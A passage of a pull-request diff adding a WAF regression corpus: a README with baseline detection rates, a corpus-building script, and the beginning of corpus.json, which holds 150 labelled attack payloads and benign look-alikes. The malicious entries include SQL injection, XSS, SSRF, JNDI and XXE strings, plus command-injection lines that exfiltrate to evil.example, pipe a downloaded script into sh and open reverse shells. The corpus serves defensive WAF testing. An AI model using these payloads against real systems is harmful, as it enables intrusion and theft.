### PR TITLE
test(waf): WAF corpus #0 — measured detection/FP regression baseline

### DIFF
--- a/benchmarks/waf-corpus/README.md
+++ b/benchmarks/waf-corpus/README.md
@@ -1,0 +1,52 @@
+# WAF corpus — detection / false-positive regression baseline
+
+Stop *asserting* WAF coverage, start *measuring* it. This fires a fixed,
+versioned corpus of attack + benign payloads at a WAF-protected zion route and
+reports **detection rate** (recall on the malicious set) and **false-positive
+rate** (benign traffic wrongly blocked). It is a **regression baseline**, not an
+authoritative WAF score — a hand-curated starting point to improve against.
+
+## Corpus
+
+`corpus.json` — **200 entries**: 150 malicious across 15 attack classes (SQLi,
+XSS, command injection, path traversal, SSRF, Log4Shell/JNDI, SSTI, XXE, NoSQL,
+LDAP, CRLF/response-splitting, open-redirect, deserialization/proto-pollution,
+GraphQL, header injection) + 50 **benign-but-spicy** payloads (legit traffic
+that *looks* attack-ish: `O'Brien`, `SELECT a plan`, `the union of…`, `1=1
+tautology`, `<b>bold</b>`, JWT-like blobs, code snippets, unicode) — the
+false-positive testers.
+
+It is **stable on purpose**: keep v1 intact for cross-version comparability.
+Regenerate from the authoring source with `python3 build-corpus.py`. Grow it to a
+higher-cardinality v2 by sourcing from public corpora (OWASP CRS regression
+suite, PayloadsAllTheThings, fuzzdb) rather than inventing payloads.
+
+## Run
+
+Start a zion with a WAF-protected `/api/*` route (block = HTTP 400), then:
+
+```bash
+# balanced (default): ZION_CONFIG=benchmarks/zion-bench-tls-waf.toml ./target/release/zion
+python3 benchmarks/waf-corpus/run.py https://127.0.0.1:4431 "zion balanced"
+```
+
+Each payload is fired in **both** vectors (query string + JSON body); a payload
+counts as detected if **either** is blocked. `run.py` exits non-zero if any
+benign payload is blocked — **a false positive is a hard fail** (precision is the
+non-negotiable; recall is the thing we improve).
+
+## Baseline — bench #0 (v0.4.3, balanced ~100 / aggressive ~190 patterns)
+
+| Profile | Detection | False positives |
+|---|--:|--:|
+| **balanced** (default) | **50.0%** (75/150) | **0.0%** (0/50) |
+| **aggressive** | **64.7%** (97/150) | **0.0%** (0/50) |
+
+Per-class recall is uneven — strong on XSS (100% aggressive), path, XXE, CRLF;
+weak on **command injection (~33%)**, deserialization, header injection, and
+internal SSRF. **Zero false positives** on the benign set in both profiles: the
+high-precision posture the design claims, now measured.
+
+The point of #0: every WAF-pattern change can now be scored as a Δ in detection
+**at constant 0% FP**, instead of asserted. Plug the holes, re-run, watch the
+number move.

--- a/benchmarks/waf-corpus/build-corpus.py
+++ b/benchmarks/waf-corpus/build-corpus.py
@@ -1,0 +1,132 @@
+#!/usr/bin/env python3
+"""Authoring source for the WAF regression corpus → emits corpus.json.
+
+200 entries: 150 malicious across 15 attack classes + 50 benign-but-spicy
+(legit traffic that *looks* attack-ish — the false-positive testers). Hand-
+curated and stable: this is the versioned baseline, not a per-run set. Grow it
+from public corpora (OWASP CRS regression suite, PayloadsAllTheThings, fuzzdb)
+for a future higher-cardinality v2 — keep this v1 intact for comparability.
+
+Regenerate: python3 build-corpus.py  →  corpus.json
+"""
+import json
+from pathlib import Path
+
+MAL = {
+ "sqli": [
+  "' OR '1'='1", "1' OR '1'='1' -- ", "admin'--", "admin' #", "'; DROP TABLE users;--",
+  "1 UNION SELECT username,password FROM users", "' UNION ALL SELECT NULL,NULL,NULL--",
+  "' UNION SELECT @@version,2,3--", "' OR SLEEP(5)--", "1;WAITFOR DELAY '0:0:5'--",
+  "' AND extractvalue(1,concat(0x7e,version()))--", "'; EXEC xp_cmdshell('whoami')--",
+  "\") OR (\"1\"=\"1", "' AND 1=CONVERT(int,@@version)--",
+  "1' AND '1'='1' UNION SELECT load_file('/etc/passwd')--", "%27%20OR%201=1--",
+  "0x27206f7220313d31", "' oR/**/1=1#", "' Or 1=1 Limit 1 -- ",
+  "1') OR ('a'='a", "'||(SELECT pass FROM users LIMIT 1)||'", "' OR 1=1 INTO OUTFILE '/tmp/x'--",
+ ],
+ "xss": [
+  "<script>alert(1)</script>", "<img src=x onerror=alert(document.cookie)>", "javascript:alert(1)",
+  "<svg/onload=alert(1)>", "\"><script>alert(String.fromCharCode(88))</script>", "<body onload=alert(1)>",
+  "<iframe src=\"javascript:alert(1)\">", "<input autofocus onfocus=alert(1)>", "<details open ontoggle=alert(1)>",
+  "<marquee onstart=alert(1)>", "<a href=\"javascript:alert(1)\">x</a>", "<scr<script>ipt>alert(1)</scr</script>ipt>",
+  "'-alert(1)-'", "<img src=1 onerror=\"&#97;lert(1)\">", "<svg><animate onbegin=alert(1) attributeName=x>",
+  "<select autofocus onfocus=alert(1)>", "<video><source onerror=alert(1)>", "javascript:/*--></title></style></script><svg onload=alert(1)>",
+  "%3Cscript%3Ealert(1)%3C/script%3E", "<x onclick=alert(1)>click", "<object data=\"javascript:alert(1)\">",
+  "<math><mtext><script>alert(1)</script>",
+ ],
+ "cmdi": [
+  "; cat /etc/passwd", "| whoami", "$(id)", "`id`", "&& ls -la /", "; rm -rf /tmp/x",
+  "|| curl http://evil.example/$(whoami)", "; nc -e /bin/sh 10.0.0.1 4444", "; ping -c 4 127.0.0.1",
+  "$(python -c 'import os;os.system(\"id\")')", "%0acat%20/etc/passwd", "; sleep 5",
+  "& type C:\\\\Windows\\\\win.ini", "$IFS$9cat$IFS/etc/passwd", "{cat,/etc/passwd}",
+  ";curl${IFS}evil.example", "`wget http://evil.example/x.sh -O- | sh`", "; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
+ ],
+ "path": [
+  "../../../etc/passwd", "..%2f..%2f..%2fetc%2fpasswd", "....//....//etc/shadow",
+  "..\\..\\..\\windows\\win.ini", "%2e%2e%2f%2e%2e%2fetc/passwd", "/proc/self/environ",
+  "file:///etc/passwd", "/var/www/html/../../../../etc/passwd", "..%252f..%252fetc/passwd",
+  "..%c0%af..%c0%afetc/passwd", "/etc/passwd%00.png", "....\\\\....\\\\boot.ini",
+  "php://filter/convert.base64-encode/resource=/etc/passwd", "/..%5c..%5c..%5cwindows/system32/drivers/etc/hosts",
+ ],
+ "ssrf": [
+  "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "http://localhost:6379/",
+  "gopher://127.0.0.1:11211/_stats", "dict://127.0.0.1:11211/stat", "http://[::ffff:169.254.169.254]/",
+  "http://127.0.0.1:22", "http://0.0.0.0:8080/admin", "http://metadata.google.internal/computeMetadata/v1/",
+  "http://2130706433/", "file:///proc/self/cwd", "ftp://127.0.0.1/", "http://localhost%2f%2e%2e/admin",
+ ],
+ "jndi": [
+  "${jndi:ldap://evil.example/a}", "${jndi:rmi://x.example/y}", "${${lower:j}ndi:dns://x.example}",
+  "${env:AWS_SECRET_ACCESS_KEY}", "${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/aWQ=}",
+  "${sys:user.name}", "${jndi:${lower:l}${lower:d}ap://x}", "${date:YYYY}",
+ ],
+ "ssti": [
+  "{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "{{config.items()}}", "{{''.__class__.__mro__[2].__subclasses__()}}",
+  "${T(java.lang.Runtime).getRuntime().exec('id')}", "{{request.application.__globals__}}", "@(7*7)", "{%if 1%}x{%endif%}",
+ ],
+ "xxe": [
+  "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
+  "<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY e SYSTEM 'file:///etc/passwd'>]><r>&e;</r>",
+  "<!ENTITY % xxe SYSTEM \"http://evil.example/x\">",
+  "<!DOCTYPE x [<!ENTITY % a SYSTEM 'file:///etc/passwd'><!ENTITY % b '<!ENTITY c \"%a;\">'>%b;]>",
+  "<?xml version=\"1.0\" encoding=\"UTF-7\"?>", "<!DOCTYPE r SYSTEM \"http://evil.example/r.dtd\">",
+ ],
+ "nosql": [
+  "{\"$gt\":\"\"}", "{\"$ne\":null}", "';return true;//", "admin' || '1'=='1",
+  "{\"$where\":\"sleep(5000)\"}", "{\"username\":{\"$regex\":\".*\"}}", "[$ne]=1", "{\"$gt\":undefined}",
+ ],
+ "ldap": [
+  "*)(uid=*))(|(uid=*", "*()|%26'", "admin)(&)", "*)(objectClass=*", "*)(|(password=*))",
+ ],
+ "crlf": [
+  "foo\r\nSet-Cookie: sessid=hijacked", "x%0d%0aLocation:%20http://evil.example",
+  "%0d%0aContent-Length:%200%0d%0a%0d%0a", "test%0aSet-Cookie:%20admin=true",
+  "%E5%98%8D%E5%98%8ASet-Cookie:%20x=1", "a\r\nHost: evil.example", "%0d%0a%0d%0a<script>alert(1)</script>",
+  "/%0d%0aX-Injected: true",
+ ],
+ "redirect": [
+  "//evil.example", "https://evil.example", "/\\evil.example", "javascript:alert(document.domain)", "data:text/html,<script>alert(1)</script>",
+ ],
+ "deser": [
+  "O:8:\"stdClass\":0:{}", "rO0ABXNyAA==", "__import__('os').system('id')",
+  "{\"__proto__\":{\"isAdmin\":true}}", "constructor[prototype][isAdmin]=true", "!!python/object/apply:os.system ['id']",
+ ],
+ "graphql": [
+  "query{__schema{types{name}}}", "{user(id:\"1 OR 1=1\"){name}}", "mutation{deleteAllUsers}",
+ ],
+ "header": [
+  "() { :;}; /bin/cat /etc/passwd", "User-Agent: () { :; }; echo vuln", "X-Forwarded-For: 127.0.0.1, evil",
+ ],
+}
+
+BENIGN = [
+ "SELECT a plan that fits your team", "I'll alert you the moment it's ready",
+ "the union of designers and engineers", "price > 100 AND rating < 5 stars",
+ "1=1 is a tautology we cover in math class", "O'Brien", "D'Angelo & Sons, Inc.",
+ "user@example.com", "https://maps.example.com/?q=cafe+near+me", "function() { return total * 1.2; }",
+ "<b>Bold</b> and <i>italic</i> text", "José from São Paulo, naïve café", "path/to/my/report.2024.json",
+ "drop me an email when you can", "a great script for the school play", "SELECT-O-MATIC vacuum, model X",
+ "comment count: 42; likes: 1337", "Mëtàl Ümläut Bänd — live in concert", "C:\\\\Users\\\\me\\\\Documents\\\\file.txt",
+ "2 * 7 = 14 and 7 * 7 = 49", "order by date, then by name please", "the cat sat on the mat",
+ "{\"name\":\"Acme\",\"qty\":3,\"price\":9.99}", "search: best practices for REST APIs", "passwd reset link requested",
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NSJ9.abc", "git commit -m 'fix the parser'",
+ "let x = a && b || c;", "the script kiddie movie was fun", "100% organic & fair-trade",
+ "我喜欢编程 and I love coding", "naïve approach to the problem", "Schrödinger's cat is both",
+ "https://en.wikipedia.org/wiki/SQL_injection", "regex: ^[a-z]+$ matches lowercase", "a < b and b > c",
+ "<!-- this is an HTML comment -->", "SELECT * is an anti-pattern, avoid it", "alert: low disk space on /var",
+ "the password must be 12+ chars", "Q1 revenue grew 7*7 percent (kidding)", "DROP-DOWN menu styling",
+ "use UNION types in TypeScript", "../docs/readme.md relative link", "cmd+shift+p opens the palette",
+ "{{ user.name }} in a Jinja template doc", "$HOME/.config/app.toml", "exec summary attached",
+ "id: 12345, name: Acme Corp", "onclick handlers should be CSP-safe",
+]
+
+corpus = []
+for cat, items in MAL.items():
+    for p in items:
+        corpus.append({"category": cat, "kind": "mal", "payload": p})
+for p in BENIGN:
+    corpus.append({"category": "benign", "kind": "benign", "payload": p})
+
+mal_n = sum(1 for c in corpus if c["kind"] == "mal")
+ben_n = sum(1 for c in corpus if c["kind"] == "benign")
+out = Path(__file__).parent / "corpus.json"
+out.write_text(json.dumps(corpus, ensure_ascii=False, indent=1))
+print(f"wrote {out} — {len(corpus)} entries ({mal_n} malicious / {ben_n} benign), {len(MAL)} attack classes")

--- a/benchmarks/waf-corpus/corpus.json
+++ b/benchmarks/waf-corpus/corpus.json
@@ -1,0 +1,1002 @@
+[
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' OR '1'='1"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1' OR '1'='1' -- "
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "admin'--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "admin' #"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'; DROP TABLE users;--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1 UNION SELECT username,password FROM users"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' UNION ALL SELECT NULL,NULL,NULL--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' UNION SELECT @@version,2,3--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' OR SLEEP(5)--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1;WAITFOR DELAY '0:0:5'--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND extractvalue(1,concat(0x7e,version()))--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'; EXEC xp_cmdshell('whoami')--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "\") OR (\"1\"=\"1"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=CONVERT(int,@@version)--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1' AND '1'='1' UNION SELECT load_file('/etc/passwd')--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "%27%20OR%201=1--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "0x27206f7220313d31"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' oR/**/1=1#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' Or 1=1 Limit 1 -- "
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1') OR ('a'='a"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'||(SELECT pass FROM users LIMIT 1)||'"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' OR 1=1 INTO OUTFILE '/tmp/x'--"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script>alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src=x onerror=alert(document.cookie)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "javascript:alert(1)"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<svg/onload=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"><script>alert(String.fromCharCode(88))</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<body onload=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<iframe src=\"javascript:alert(1)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<input autofocus onfocus=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<details open ontoggle=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<marquee onstart=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"javascript:alert(1)\">x</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<scr<script>ipt>alert(1)</scr</script>ipt>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "'-alert(1)-'"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src=1 onerror=\"&#97;lert(1)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<svg><animate onbegin=alert(1) attributeName=x>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<select autofocus onfocus=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<video><source onerror=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "javascript:/*--></title></style></script><svg onload=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "%3Cscript%3Ealert(1)%3C/script%3E"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<x onclick=alert(1)>click"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<object data=\"javascript:alert(1)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<math><mtext><script>alert(1)</script>"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; cat /etc/passwd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "| whoami"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$(id)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "`id`"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& ls -la /"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; rm -rf /tmp/x"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "|| curl http://evil.example/$(whoami)"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; nc -e /bin/sh 10.0.0.1 4444"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; ping -c 4 127.0.0.1"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$(python -c 'import os;os.system(\"id\")')"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%0acat%20/etc/passwd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; sleep 5"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& type C:\\\\Windows\\\\win.ini"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "$IFS$9cat$IFS/etc/passwd"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "{cat,/etc/passwd}"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": ";curl${IFS}evil.example"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "`wget http://evil.example/x.sh -O- | sh`"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "../../../etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%2f..%2f..%2fetc%2fpasswd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "....//....//etc/shadow"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..\\..\\..\\windows\\win.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "%2e%2e%2f%2e%2e%2fetc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/proc/self/environ"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "file:///etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/var/www/html/../../../../etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%252f..%252fetc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "..%c0%af..%c0%afetc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/etc/passwd%00.png"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "....\\\\....\\\\boot.ini"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "php://filter/convert.base64-encode/resource=/etc/passwd"
+ },
+ {
+  "category": "path",
+  "kind": "mal",
+  "payload": "/..%5c..%5c..%5cwindows/system32/drivers/etc/hosts"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://localhost:6379/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "gopher://127.0.0.1:11211/_stats"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "dict://127.0.0.1:11211/stat"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://[::ffff:169.254.169.254]/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://127.0.0.1:22"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://0.0.0.0:8080/admin"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://metadata.google.internal/computeMetadata/v1/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://2130706433/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "file:///proc/self/cwd"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ftp://127.0.0.1/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://localhost%2f%2e%2e/admin"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${jndi:ldap://evil.example/a}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${jndi:rmi://x.example/y}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${${lower:j}ndi:dns://x.example}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${env:AWS_SECRET_ACCESS_KEY}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/aWQ=}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${sys:user.name}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${jndi:${lower:l}${lower:d}ap://x}"
+ },
+ {
+  "category": "jndi",
+  "kind": "mal",
+  "payload": "${date:YYYY}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "{{7*7}}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "${7*7}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "<%= 7*7 %>"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "#{7*7}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "{{config.items()}}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "{{''.__class__.__mro__[2].__subclasses__()}}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "${T(java.lang.Runtime).getRuntime().exec('id')}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "{{request.application.__globals__}}"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "@(7*7)"
+ },
+ {
+  "category": "ssti",
+  "kind": "mal",
+  "payload": "{%if 1%}x{%endif%}"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY e SYSTEM 'file:///etc/passwd'>]><r>&e;</r>"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<!ENTITY % xxe SYSTEM \"http://evil.example/x\">"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<!DOCTYPE x [<!ENTITY % a SYSTEM 'file:///etc/passwd'><!ENTITY % b '<!ENTITY c \"%a;\">'>%b;]>"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\" encoding=\"UTF-7\"?>"
+ },
+ {
+  "category": "xxe",
+  "kind": "mal",
+  "payload": "<!DOCTYPE r SYSTEM \"http://evil.example/r.dtd\">"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"$gt\":\"\"}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"$ne\":null}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "';return true;//"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "admin' || '1'=='1"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"$where\":\"sleep(5000)\"}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"username\":{\"$regex\":\".*\"}}"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "[$ne]=1"
+ },
+ {
+  "category": "nosql",
+  "kind": "mal",
+  "payload": "{\"$gt\":undefined}"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*)(uid=*))(|(uid=*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*()|%26'"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "admin)(&)"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*)(objectClass=*"
+ },
+ {
+  "category": "ldap",
+  "kind": "mal",
+  "payload": "*)(|(password=*))"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo\r\nSet-Cookie: sessid=hijacked"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "x%0d%0aLocation:%20http://evil.example"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0aContent-Length:%200%0d%0a%0d%0a"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test%0aSet-Cookie:%20admin=true"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%E5%98%8D%E5%98%8ASet-Cookie:%20x=1"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "a\r\nHost: evil.example"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0a%0d%0a<script>alert(1)</script>"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%0d%0aX-Injected: true"
+ },
+ {
+  "category": "redirect",
+  "kind": "mal",
+  "payload": "//evil.example"
+ },
+ {
+  "category": "redirect",
+  "kind": "mal",
+  "payload": "https://evil.example"
+ },
+ {
+  "category": "redirect",
+  "kind": "mal",
+  "payload": "/\\evil.example"
+ },
+ {
+  "category": "redirect",
+  "kind": "mal",
+  "payload": "javascript:alert(document.domain)"
+ },
+ {
+  "category": "redirect",
+  "kind": "mal",
+  "payload": "data:text/html,<script>alert(1)</script>"
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "O:8:\"stdClass\":0:{}"
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "rO0ABXNyAA=="
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "__import__('os').system('id')"
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "{\"__proto__\":{\"isAdmin\":true}}"
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "constructor[prototype][isAdmin]=true"
+ },
+ {
+  "category": "deser",
+  "kind": "mal",
+  "payload": "!!python/object/apply:os.system ['id']"
+ },
+ {
+  "category": "graphql",
+  "kind": "mal",
+  "payload": "query{__schema{types{name}}}"
+ },
+ {
+  "category": "graphql",
+  "kind": "mal",
+  "payload": "{user(id:\"1 OR 1=1\"){name}}"
+ },
+ {
+  "category": "graphql",
+  "kind": "mal",
+  "payload": "mutation{deleteAllUsers}"
+ },
+ {
+  "category": "header",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/cat /etc/passwd"
+ },
+ {
+  "category": "header",
+  "kind": "mal",
+  "payload": "User-Agent: () { :; }; echo vuln"
+ },
+ {
+  "category": "header",
+  "kind": "mal",
+  "payload": "X-Forwarded-For: 127.0.0.1, evil"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT a plan that fits your team"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "I'll alert you the moment it's ready"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the union of designers and engineers"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "price > 100 AND rating < 5 stars"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "1=1 is a tautology we cover in math class"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "O'Brien"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "D'Angelo & Sons, Inc."
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "user@example.com"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "https://maps.example.com/?q=cafe+near+me"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "function() { return total * 1.2; }"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<b>Bold</b> and <i>italic</i> text"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "José from São Paulo, naïve café"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "path/to/my/report.2024.json"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "drop me an email when you can"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a great script for the school play"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT-O-MATIC vacuum, model X"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
